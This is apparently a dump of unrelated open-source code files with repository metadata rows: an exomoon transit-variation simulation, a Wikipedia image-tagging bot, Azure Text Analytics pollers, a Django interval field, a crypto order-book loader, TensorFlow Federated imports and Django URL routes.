# direction of the force
fx = math.cos(theta) * f
fy = math.sin(theta) * f
return fx, fy
def loop(bodies, orbit_duration):
"""([Body]) Loops and updates the positions of all the provided bodies"""
# Calculate the duration of our simulation: One full orbit of the outer moon
seconds_per_day = 24*60*60
timesteps_per_day = 1000
timestep = seconds_per_day / timesteps_per_day
total_steps = int(orbit_duration / 3600 / 24 * timesteps_per_day)
#print total_steps, orbit_duration / 24 / 60 / 60
for body in bodies:
body.penup()
body.hideturtle()
for step in range(total_steps):
for body in bodies:
if body.name == 'planet':
# Add current position and velocity to our list
tdv_list.append(body.vx)
ttv_list.append(body.px)
force = {}
for body in bodies:
# Add up all of the forces exerted on 'body'
total_fx = total_fy = 0.0
for other in bodies:
# Don't calculate the body's attraction to itself
if body is other:
continue
fx, fy = body.attraction(other)
total_fx += fx
total_fy += fy
# Record the total force exerted
force[body] = (total_fx, total_fy)
# Update velocities based upon on the force
for body in bodies:
fx, fy = force[body]
body.vx += fx / body.mass * timestep
body.vy += fy / body.mass * timestep
# Update positions
body.px += body.vx * timestep
body.py += body.vy * timestep
#body.goto(body.px*SCALE, body.py*SCALE)
#body.dot(3)
def run_sim(R_star, transit_duration, bodies):
"""Run 3-body sim and convert results to TTV + TDV values in [minutes]"""
# Run 3-body sim for one full orbit of the outermost moon
loop(bodies, orbit_duration)
# Move resulting data from lists to numpy arrays
ttv_array = numpy.array([])
ttv_array = ttv_list
tdv_array = numpy.array([])
tdv_array = tdv_list
# Zeropoint correction
middle_point = numpy.amin(ttv_array) + numpy.amax(ttv_array)
ttv_array = numpy.subtract(ttv_array, 0.5 * middle_point)
ttv_array = numpy.divide(ttv_array, 1000) # km/s
# Compensate for barycenter offset of planet at start of simulation:
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon)
stretch_factor = 1 / ((planet.px / 1000) / numpy.amax(ttv_array))
ttv_array = numpy.divide(ttv_array, stretch_factor)
# Convert to time units, TTV
ttv_array = numpy.divide(ttv_array, R_star)
ttv_array = numpy.multiply(ttv_array, transit_duration * 60 * 24) # minutes
# Convert to time units, TDV
oldspeed = (2 * R_star / transit_duration) * 1000 / 24 / 60 / 60 # m/sec
newspeed = oldspeed - numpy.amax(tdv_array)
difference = (transit_duration - (transit_duration * newspeed / oldspeed)) * 24 * 60
conversion_factor = difference / numpy.amax(tdv_array)
tdv_array = numpy.multiply(tdv_array, conversion_factor)
return ttv_array, tdv_array
"""Main routine"""
# Set variables and constants. Do not change these!
G = 6.67428e-11 # Gravitational constant G
SCALE = 5e-07 # [px/m] Only needed for plotting during nbody-sim
tdv_list = []
ttv_list = []
R_star = 6.96 * 10**5 # [km], solar radius
transit_duration = (2*pi/sqrt(G*(M_sun+M_jup)/a_jup**3)*R_sun/(pi*a_jup)*sqrt((1+R_jup/R_sun)**2))/60/60/24 # transit duration without a moon, Eq. (C1) Kipping (2009b, MNRAS), for q = 0
print transit_duration
planet = Body()
planet.name = 'planet'
planet.mass = M_jup
#semimajor_axis = 1. * AU #[m]
semimajor_axis = a_jup
stellar_mass = M_sun
radius_hill = semimajor_axis * (planet.mass / (3 * (stellar_mass))) ** (1./3)
# Define parameters
firstmoon = Body()
firstmoon.mass = M_gan
firstmoon.px = 0.4218 * 10**9
secondmoon = Body()
secondmoon.mass = M_gan
secondmoon.px = 0.48945554 * 10**9
thirdmoon = Body()
thirdmoon.mass = M_gan
thirdmoon.px = 0.59293316 * 10**9
fourthmoon = Body()
fourthmoon.mass = M_gan
fourthmoon.px = 1.23335068 * 10**9
# Calculate start velocities
firstmoon.vy = math.sqrt(G * planet.mass * (2 / firstmoon.px - 1 / firstmoon.px))
secondmoon.vy = math.sqrt(G * planet.mass * (2 / secondmoon.px - 1 / secondmoon.px))
thirdmoon.vy = math.sqrt(G * planet.mass * (2 / thirdmoon.px - 1 / thirdmoon.px))
fourthmoon.vy = math.sqrt(G * planet.mass * (2 / fourthmoon.px - 1 / fourthmoon.px))
planet.vy = (-secondmoon.vy * secondmoon.mass - firstmoon.vy * firstmoon.mass) / planet.mass
# Calculate planet displacement. This holds for circular orbits
gravity_firstmoon = (firstmoon.mass / planet.mass) * firstmoon.px
gravity_secondmoon = (secondmoon.mass / planet.mass) * secondmoon.px
gravity_thirdmoon = (thirdmoon.mass / planet.mass) * thirdmoon.px
gravity_fourthmoon = (fourthmoon.mass / planet.mass) * fourthmoon.px
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon + gravity_thirdmoon + gravity_fourthmoon)
# Use the outermost moon to calculate the length of one full orbit duration
orbit_duration = math.sqrt((4 * math.pi**2 *fourthmoon.px ** 3) / (G * (fourthmoon.mass + planet.mass)))
orbit_duration = orbit_duration * 1.002
# Run simulation. Make sure to add/remove the moons you want to simulate!
ttv_array, tdv_array = run_sim(
R_star,
transit_duration,
[planet, firstmoon, secondmoon, thirdmoon, fourthmoon])
# Output information
print 'TTV amplitude =', numpy.amax(ttv_array), \
'[min] = ', numpy.amax(ttv_array) * 60, '[sec]'
print 'TDV amplitude =', numpy.amax(tdv_array), \
'[min] = ', numpy.amax(tdv_array) * 60, '[sec]'
ax = plt.axes()
plt.plot(ttv_array, tdv_array, color = 'k')
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
plt.rc('text', usetex=True)
plt.tick_params(axis='both', which='major', labelsize = 16)
plt.xlabel('transit timing variation [minutes]', fontsize = 16)
plt.ylabel('transit duration variation [minutes]', fontsize = 16)
ax.tick_params(direction='out')
plt.ylim([numpy.amin(tdv_array) * 1.2, numpy.amax(tdv_array) * 1.2])
plt.xlim([numpy.amin(ttv_array) * 1.2, numpy.amax(ttv_array) * 1.2])
plt.plot((0, 0), (numpy.amax(tdv_array) * 10., numpy.amin(tdv_array) * 10.), 'k', linewidth=0.5)
plt.plot((numpy.amin(ttv_array) * 10., numpy.amax(ttv_array) * 10.), (0, 0), 'k', linewidth=0.5)
# Fix axes for comparison with eccentric moon
plt.xlim(-0.11, +0.11)
plt.ylim(-0.8, +0.8)
plt.annotate(r"5:4:3:1", xy=(-0.105, +0.7), size=16)
plt.savefig("fig_system_20.eps", bbox_inches = 'tight')
| mit | -120,625,737,298,135,980 | 34.539171 | 185 | 0.638485 | false |
alemela/alessiobot | script/add_immagine_orfana.py | 1 | 2591 | # -*- coding: utf-8 -*-
import pywikibot, re, subprocess
from pywikibot import pagegenerators
import time, sys
start = time.clock()
args = pywikibot.handleArgs()
site = pywikibot.Site('it', 'wikipedia')
today = time.strftime("%Y%m%d")
if sys.argv[1] == "immagini_orfane_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_libere/'+today+'.txt'
template = u'{{Immagine orfana|libera}}'
comment = u'Bot: immagine orfana con licenza libera'
elif sys.argv[1] == "immagini_orfane_non_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_non_libere/'+today+'.txt'
template = u'{{Immagine orfana|non libera}}'
comment = u'Bot: immagine orfana con licenza non libera'
elif sys.argv[1] == "immagini_orfane_pd_italia":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_pd_italia/'+today+'.txt'
template = u'{{Immagine orfana|PD-Italia}}'
comment = u'Bot: immagine orfana con licenza PD italia'
elif sys.argv[1] == "immagini_orfane_sconosciute":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_sconosciute/'+today+'.txt'
template = u'{{Immagine orfana}}'
comment = u'Bot: immagine orfana con licenza sconosciuta'
else:
print "Unvalid type of licence"
exit()
has_template = r'\{\{(?:template:|)(immagine_orfana)[\|\}]'
def main():
add_lists = pagegenerators.TextfilePageGenerator(path)
for page in add_lists:
# Check if the page exists or if there's already the template
try:
oldtxt = page.get()
except pywikibot.NoPage:
pywikibot.output(u"%s doesn't exist! Skip" % page.title())
continue
except pywikibot.IsRedirectPage:
pywikibot.output(u"%s is redirect, skip" % page.title(asLink=True))
            continue
check_notice = re.findall(has_template, oldtxt.lower())
if check_notice != []:
            pywikibot.output(u'Template already in %s, skip' % page.title())
continue
# Ok, the page need the template. Let's put it there!
newtxt = u"%s\n%s" % (template, oldtxt)
try:
page.put(newtxt, comment)
pywikibot.output(u"\t\t>>> %s <<<" % page.title())
# pywikibot.output(u"editing!!!")
except pywikibot.LockedPage:
pywikibot.output(u'%s is a locked page! Skip' %page.title())
continue
except pywikibot.EditConflict:
pywikibot.output(u'Edit Conflict! Skip')
continue
if __name__ == "__main__":
try:
main()
finally:
pywikibot.stopme()
end=time.clock()
print "Run time: ", end-start
| mit | 921,331,364,314,386,600 | 34.013514 | 100 | 0.657661 | false |
Azure/azure-sdk-for-python | sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/aio/_lro_async.py | 1 | 11430 | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import datetime
from typing import Optional
from azure.core.exceptions import HttpResponseError
from azure.core.polling import AsyncLROPoller
from azure.core.polling.base_polling import OperationFailed, BadStatus
from azure.core.polling.async_base_polling import AsyncLROBasePolling
from azure.core.polling._async_poller import PollingReturnType
_FINISHED = frozenset(["succeeded", "cancelled", "failed", "partiallycompleted"])
_FAILED = frozenset(["failed"])
_SUCCEEDED = frozenset(["succeeded", "partiallycompleted"])
class TextAnalyticsAsyncLROPollingMethod(AsyncLROBasePolling):
def finished(self):
"""Is this polling finished?
:rtype: bool
"""
return TextAnalyticsAsyncLROPollingMethod._finished(self.status())
@staticmethod
def _finished(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FINISHED
@staticmethod
def _failed(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FAILED
@staticmethod
def _raise_if_bad_http_status_and_method(response):
"""Check response status code is valid.
Must be 200, 201, 202, or 204.
:raises: BadStatus if invalid status.
"""
code = response.status_code
if code in {200, 201, 202, 204}:
return
raise BadStatus(
"Invalid return status {!r} for {!r} operation".format(
code, response.request.method
)
)
async def _poll(self): # pylint:disable=invalid-overridden-method
"""Poll status of operation so long as operation is incomplete and
we have an endpoint to query.
:param callable update_cmd: The function to call to retrieve the
latest status of the long running operation.
:raises: OperationFailed if operation status 'Failed' or 'Canceled'.
:raises: BadStatus if response status invalid.
:raises: BadResponse if response invalid.
"""
while not self.finished():
await self._delay()
await self.update_status()
if TextAnalyticsAsyncLROPollingMethod._failed(self.status()):
raise OperationFailed("Operation failed or canceled")
final_get_url = self._operation.get_final_get_url(self._pipeline_response)
if final_get_url:
self._pipeline_response = await self.request_status(final_get_url)
TextAnalyticsAsyncLROPollingMethod._raise_if_bad_http_status_and_method(
self._pipeline_response.http_response
)
class AsyncAnalyzeHealthcareEntitiesLROPollingMethod(
TextAnalyticsAsyncLROPollingMethod
):
def __init__(self, *args, **kwargs):
self._text_analytics_client = kwargs.pop("text_analytics_client")
super(AsyncAnalyzeHealthcareEntitiesLROPollingMethod, self).__init__(
*args, **kwargs
)
@property
def _current_body(self):
from .._generated.v3_1.models import JobMetadata
return JobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeHealthcareEntitiesLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeHealthcareEntitiesLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your healthcare entities job was created
:return: When your healthcare entities job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def expires_on(self) -> datetime.datetime:
"""When your healthcare entities job will expire
:return: When your healthcare entities job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def last_modified_on(self) -> datetime.datetime:
"""When your healthcare entities job was last modified
:return: When your healthcare entities job was last modified
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def id(self) -> str:
"""ID of your call to :func:`begin_analyze_healthcare_entities`
:return: ID of your call to :func:`begin_analyze_healthcare_entities`
:rtype: str
"""
return self.polling_method().id
async def cancel( # type: ignore
self, **kwargs
) -> "AsyncLROPoller[None]":
"""Cancel the operation currently being polled.
:keyword int polling_interval: The polling interval to use to poll the cancellation status.
The default value is 5 seconds.
:return: Returns an instance of an AsyncLROPoller that returns None.
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError: When the operation has already reached a terminal state.
.. admonition:: Example:
.. literalinclude:: ../samples/async_samples/sample_analyze_healthcare_entities_with_cancellation_async.py
:start-after: [START analyze_healthcare_entities_with_cancellation_async]
:end-before: [END analyze_healthcare_entities_with_cancellation_async]
:language: python
:dedent: 4
:caption: Cancel an existing health operation.
"""
polling_interval = kwargs.pop("polling_interval", 5)
await self.polling_method().update_status()
try:
return await getattr(
self._polling_method, "_text_analytics_client"
).begin_cancel_health_job(
self.id,
polling=TextAnalyticsAsyncLROPollingMethod(timeout=polling_interval),
)
except HttpResponseError as error:
from .._response_handlers import process_http_response_error
process_http_response_error(error)
class AsyncAnalyzeActionsLROPollingMethod(TextAnalyticsAsyncLROPollingMethod):
@property
def _current_body(self):
from .._generated.v3_1.models import AnalyzeJobMetadata
return AnalyzeJobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def display_name(self):
if not self._current_body:
return None
return self._current_body.display_name
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def actions_failed_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["failed"]
@property
def actions_in_progress_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["inProgress"]
@property
def actions_succeeded_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["completed"]
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def total_actions_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["total"]
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeActionsLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeActionsLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your analyze job was created
:return: When your analyze job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def display_name(self) -> Optional[str]:
"""The display name of your :func:`begin_analyze_actions` call.
Corresponds to the `display_name` kwarg you pass to your
:func:`begin_analyze_actions` call.
:return: The display name of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().display_name
@property
def expires_on(self) -> datetime.datetime:
"""When your analyze job will expire
:return: When your analyze job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def actions_failed_count(self) -> int:
"""Total number of actions that have failed
:return: Total number of actions that have failed
:rtype: int
"""
return self.polling_method().actions_failed_count
@property
def actions_in_progress_count(self) -> int:
"""Total number of actions currently in progress
:return: Total number of actions currently in progress
:rtype: int
"""
return self.polling_method().actions_in_progress_count
@property
def actions_succeeded_count(self) -> int:
"""Total number of actions that succeeded
:return: Total number of actions that succeeded
:rtype: int
"""
return self.polling_method().actions_succeeded_count
@property
def last_modified_on(self) -> datetime.datetime:
"""The last time your actions results were updated
:return: The last time your actions results were updated
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def total_actions_count(self) -> int:
"""Total number of actions you submitted
:return: Total number of actions submitted
:rtype: int
"""
return self.polling_method().total_actions_count
@property
def id(self) -> str:
"""ID of your :func:`begin_analyze_actions` call.
:return: ID of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().id
| mit | -4,780,159,262,981,646,000 | 31.844828 | 118 | 0.636308 | false |
dbservice/dbservice | dbservice/apps/utils/fields.py | 1 | 5914 | import re
from dateutil.relativedelta import relativedelta
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import ugettext_lazy as _
import psycopg2.extensions
def _parse_opt_num(s):
if not s:
# For the ISO 8601 duration specifications, fields need not be
# explicitly included if their value is zero --- None from regexp
# should become 0.
return 0
try:
# Prefer integers. Only last specified field is allowed to contain a
# fractional part, though we don't explicitly check this.
# TODO: Check; is this still necessary/relevant/preferable to using
# float() for all fields?
return int(s)
except ValueError:
return float(s.replace(',', '.'))
# PnW
ISO_WEEK_RX = re.compile(
r'^P(\d+(?:[.,]\d*)?)W$')
# P[nY][nM][nD][T[nH][nM][nS]]
ISO_RX = re.compile(
r'^P'
r'(?:(\d+(?:[.,]\d*)?)Y)?' # year
r'(?:(\d+(?:[.,]\d*)?)M)?' # month
r'(?:(\d+(?:[.,]\d*)?)D)?' # day
r'(?:T' # start optional time part
r'(?:(\d+(?:[.,]\d*)?)H)?' # hour
r'(?:(\d+(?:[.,]\d*)?)M)?' # minute
r'(?:(\d+(?:[.,]\d*)?)S)?' # second
r')?' # end optional time part
r'$')
def _iso8601_to_relativedelta(s):
"""
Parse a duration specification in the accepted ISO 8601 formats
'PnYnMnDTnHnMnS' or 'PnW' to a ``relativedelta`` object.
"""
match = ISO_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = \
[_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
match = ISO_WEEK_RX.match(s)
if match:
weeks = _parse_opt_num(match.groups()[0])
return relativedelta(weeks=weeks)
raise ValueError('Invalid ISO 8601 duration string %s' % s)
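# Illustrative results of the parser above (assumed, shown for documentation only):
#   _iso8601_to_relativedelta('P1Y2M3DT4H5M6S')
#       -> relativedelta(years=+1, months=+2, days=+3, hours=+4, minutes=+5, seconds=+6)
#   _iso8601_to_relativedelta('P2W') -> relativedelta(days=+14)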
def _relativedelta_to_iso8601(val):
"""
Construct an ISO 8601 duration specification string from the provided
``relativedelta`` object.
"""
if val.leapdays:
raise ValueError('"leapdays" not representable')
if any([getattr(val, f) is not None for f in (
'year', 'month', 'day', 'weekday',
'hour', 'minute', 'second', 'microsecond')]):
raise ValueError(
            'relativedelta {} represents an absolute timestamp; '
'not a duration'.format(val))
seconds = val.seconds
if val.microseconds:
seconds += val.microseconds / 1000000.0
return 'P{years}Y{months}M{days}DT{hours}H{minutes}M{seconds}S'.format(
years=val.years, months=val.months, days=val.days,
hours=val.hours, minutes=val.minutes, seconds=seconds)
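# Illustrative round-trip (assumed): a pure duration serializes with explicit zero fields:
#   _relativedelta_to_iso8601(relativedelta(days=2, hours=3)) == 'P0Y0M2DT3H0M0S'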
# [Y year[s]] [M mon[s]] [D day[s]] [HH:MM:SS[.s*]
POSTGRES_RX = re.compile(
r'^'
r'(?:(\d+) years? ?)?'
r'(?:(\d+) mons? ?)?'
r'(?:(\d+) days? ?)?'
r'(?:' # start optional time part
r'(\d+):(\d+):(\d+(?:\.\d*)?)'
r')?' # end optional time part
r'$')
def _postgres_to_relativedelta(s):
"""
Parse interval output in the default "postgres" style for PostgreSQL into a
``relativedelta``.
"""
match = POSTGRES_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = [
_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
raise ValueError('Unrecognized postgres interval string \'%s\'' % s)
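# Illustrative input accepted above (assumed "postgres"-style interval output):
#   _postgres_to_relativedelta('1 year 2 mons 3 days 04:05:06')
#       -> relativedelta(years=+1, months=+2, days=+3, hours=+4, minutes=+5, seconds=+6)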
# Set "output" type for INTERVALs from the DB to be relativedelta.
INTERVAL2RELATIVEDELTA = psycopg2.extensions.new_type(
psycopg2.extensions.INTERVAL.values,
'INTERVAL2RELATIVEDELTA',
lambda value, curs:
_postgres_to_relativedelta(value) if value is not None else None)
psycopg2.extensions.register_type(INTERVAL2RELATIVEDELTA)
# Set conversion of relativedelta on "input" to the DB to be an appropriate ISO
# 8601 duration string.
def _adapt_relativedelta(val):
return psycopg2.extensions.AsIs("'{}'".format(
_relativedelta_to_iso8601(val)))
psycopg2.extensions.register_adapter(relativedelta, _adapt_relativedelta)
class IntervalField(models.Field):
description = 'A time interval'
__metaclass__ = models.SubfieldBase
default_error_messages = {
'invalid': _("'%s' value has an invalid format. It must be in "
"ISO 8601 duration (PnYnMnDTnHnMnS or PnW) format."),
}
def db_type(self, connection):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return 'interval'
def to_python(self, value):
if isinstance(value, relativedelta):
return value
if value is None or value == '':
return None
try:
return _iso8601_to_relativedelta(value)
except ValueError:
# any parse error becomes the same "invalid" error...
msg = self.error_messages['invalid'] % value
raise ValidationError(msg)
def get_db_prep_value(self, value, connection, prepared=False):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return super().get_db_prep_value(
value, connection, prepared)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
if value is None:
return ''
else:
return _relativedelta_to_iso8601(value)
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules(
[],
[r'^dbservice\.apps\.utils\.fields\.IntervalField'])
except ImportError:
pass
| mit | 987,401,872,882,005,600 | 32.412429 | 79 | 0.609063 | false |
rnicoll/cryptocurrency-market-data | old/load_data_vtc.py | 1 | 3580 | #!/usr/bin/python3.2
import pymongo
from datetime import datetime
import json
from os import listdir, remove
from os.path import isdir, isfile, join
from pymongo import MongoClient
import pprint
class ExchangeError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def importCryptsy(bid_currency, quote_currency, book_data, content, file_time):
if (content['success'] != 1):
raise ExchangeError('Unsuccessful response from Cryptsy')
if (not isinstance(content['return'], dict)):
raise ExchangeError('No object in response from Cryptsy')
market_data = content['return'][bid_currency]
asks = []
bids = []
if (isinstance(market_data['sellorders'], list)):
for order in market_data['sellorders']:
asks.append([order['price'], order['quantity']])
if (isinstance(market_data['buyorders'], list)):
for order in market_data['buyorders']:
bids.append([order['price'], order['quantity']])
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Cryptsy",
"time": file_time,
"asks": asks,
"bids": bids}
book_data.insert(book)
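# Assumed shape of the Cryptsy order-book response consumed above (illustrative values):
#   {"success": 1,
#    "return": {"VTC": {"sellorders": [{"price": 0.0001, "quantity": 10.0}, ...],
#                       "buyorders":  [{"price": 0.00009, "quantity": 5.0}, ...]}}}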
def importVircurex(bid_currency, quote_currency, book_data, content, file_time):
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Vircurex",
"time": file_time,
"asks": content["asks"],
"bids": content["bids"]}
book_data.insert(book)
client = MongoClient()
market_data_db = client.market_data
imported_files = market_data_db.imported_files
book_data = market_data_db.book
base_dir = "/home/jrn/cryptocurrency_data/vtc_book_data"
pp = pprint.PrettyPrinter(indent=4)
for hour in [ d for d in listdir(base_dir) if isdir(join(base_dir, d)) ]:
hour_dir = join(base_dir, hour)
for exchange in [ d for d in listdir(hour_dir) if isdir(join(hour_dir, d)) ]:
exchange_dir = join(hour_dir, exchange)
for data_file in [ f for f in listdir(exchange_dir) if isfile(join(exchange_dir, f)) ]:
file_path = join(exchange_dir, data_file)
file_time = datetime.strptime(data_file, "%Y-%m-%dT%H:%M+0000.json")
existing_file = imported_files.find_one({"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file})
if (existing_file):
print("File " + file_path + " already imported.")
continue
imported_file = {"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file}
try:
with open(file_path, 'r') as f:
content = json.load(f)
except ValueError:
print ("File " + file_path + " contains is not valid JSON.")
remove(file_path)
continue
try:
object_id = imported_files.insert(imported_file)
if (exchange == "Cryptsy"):
importCryptsy("VTC", "BTC", book_data, content, file_time)
elif (exchange == "Vircurex"):
importVircurex("VTC", "BTC", book_data, content, file_time)
except KeyError as e:
print ("File " + file_path + " is invalid, missing key: " + str(e))
continue
except ExchangeError:
print ("File " + file_path + " is not a valid dataset.")
continue
| mit | -6,724,503,697,391,267,000 | 33.095238 | 95 | 0.575419 | false |
tensorflow/federated | tensorflow_federated/python/core/framework/__init__.py | 1 | 4934 | # Copyright 2018, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for extending the TensorFlow Federated core library."""
from tensorflow_federated.python.core.impl.compiler.building_blocks import ComputationBuildingBlock
from tensorflow_federated.python.core.impl.compiler.intrinsic_reductions import replace_intrinsics_with_bodies
from tensorflow_federated.python.core.impl.compiler.tree_to_cc_transformations import TFParser
from tensorflow_federated.python.core.impl.computation.computation_serialization import deserialize_computation
from tensorflow_federated.python.core.impl.computation.computation_serialization import serialize_computation
from tensorflow_federated.python.core.impl.context_stack.context_base import Context
from tensorflow_federated.python.core.impl.context_stack.context_stack_base import ContextStack
from tensorflow_federated.python.core.impl.context_stack.get_context_stack import get_context_stack
from tensorflow_federated.python.core.impl.context_stack.set_default_context import set_default_context
from tensorflow_federated.python.core.impl.executors.caching_executor import CachingExecutor
from tensorflow_federated.python.core.impl.executors.cardinality_carrying_base import CardinalityCarrying
from tensorflow_federated.python.core.impl.executors.data_backend_base import DataBackend
from tensorflow_federated.python.core.impl.executors.data_executor import DataExecutor
from tensorflow_federated.python.core.impl.executors.eager_tf_executor import EagerTFExecutor
from tensorflow_federated.python.core.impl.executors.execution_context import ExecutionContext
from tensorflow_federated.python.core.impl.executors.executor_base import Executor
from tensorflow_federated.python.core.impl.executors.executor_factory import ExecutorFactory
from tensorflow_federated.python.core.impl.executors.executor_serialization import deserialize_value
from tensorflow_federated.python.core.impl.executors.executor_serialization import serialize_value
from tensorflow_federated.python.core.impl.executors.executor_service import ExecutorService
from tensorflow_federated.python.core.impl.executors.executor_stacks import local_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_stacks import remote_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_stacks import ResourceManagingExecutorFactory
from tensorflow_federated.python.core.impl.executors.executor_stacks import SizeInfo
from tensorflow_federated.python.core.impl.executors.executor_stacks import sizing_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_stacks import SizingExecutorFactory
from tensorflow_federated.python.core.impl.executors.executor_stacks import thread_debugging_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_value_base import ExecutorValue
from tensorflow_federated.python.core.impl.executors.federated_composing_strategy import FederatedComposingStrategy
from tensorflow_federated.python.core.impl.executors.federated_resolving_strategy import FederatedResolvingStrategy
from tensorflow_federated.python.core.impl.executors.federating_executor import FederatingExecutor
from tensorflow_federated.python.core.impl.executors.federating_executor import FederatingStrategy
from tensorflow_federated.python.core.impl.executors.ingestable_base import Ingestable
from tensorflow_federated.python.core.impl.executors.reference_resolving_executor import ReferenceResolvingExecutor
from tensorflow_federated.python.core.impl.executors.remote_executor import RemoteExecutor
from tensorflow_federated.python.core.impl.executors.thread_delegating_executor import ThreadDelegatingExecutor
from tensorflow_federated.python.core.impl.executors.transforming_executor import TransformingExecutor
from tensorflow_federated.python.core.impl.types.type_analysis import contains as type_contains
from tensorflow_federated.python.core.impl.types.type_conversions import type_from_tensors
from tensorflow_federated.python.core.impl.types.type_conversions import type_to_tf_tensor_specs
from tensorflow_federated.python.core.impl.types.type_serialization import deserialize_type
from tensorflow_federated.python.core.impl.types.type_serialization import serialize_type
from tensorflow_federated.python.core.impl.wrappers.computation_wrapper_instances import building_block_to_computation
| apache-2.0 | 1,430,327,673,342,203,000 | 84.068966 | 118 | 0.861775 | false |
carpedm20/movieduk | movieduk/urls.py | 1 | 2693 | from django.conf.urls import patterns, include, url
#import autocomplete_light
#autocomplete_light.autodiscover()
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
from movieduk import settings
urlpatterns = patterns('',
#(r'^account/', include('account.urls')),
(r'^media/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.MEDIA_ROOT}),
(r'^asset/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.ASSET_ROOT}),
url(r'^api/get_info/', 'core.views.get_info', name='get_info'),
url(r'^api/get_search_list/', 'core.views.get_search_list', name='get_search_list'),
url(r'^api/get_list/', 'core.views.get_list', name='get_list'),
url(r'^api/get_short_list/', 'core.views.get_short_list', name='get_short_list'),
url(r'^freetalk', 'account.views.free', name='index'),
url(r'^rank', 'rank.views.index', name='index'),
url(r'^api/get_rank/', 'rank.views.get_rank', name='get_rank'),
url(r'^api/is_login', 'account.views.is_login', name='is_login'),
url(r'^api/check_movie', 'account.views.check_movie', name='check_movie'),
url(r'^profile/(?P<un>.*)', 'account.views.profile', name='profile'),
url(r'^social', 'account.views.social', name='social'),
url( r'upload$', 'core.views.upload', name = 'jfu_upload' ),
url( r'^delete/(?P<pk>\d+)$', 'core.views.upload_delete', name = 'jfu_delete' ),
#url(r'', include('social_auth.urls')),
url(r'^login', 'account.views.sign_in'),
url(r'^logout', 'account.views.sign_out'),
url(r'^admin/', include(admin.site.urls)),
url(r'^movieduk', 'core.views.movieduk'),
url(r'^$', 'core.views.index'),
url(r'^short', 'core.views.index_short'),
url(r'^index$', 'core.views.index'),
url(r'^random', 'core.views.random', name='index'),
url(r'^watch', 'core.views.movie_search', name='movie_search'),
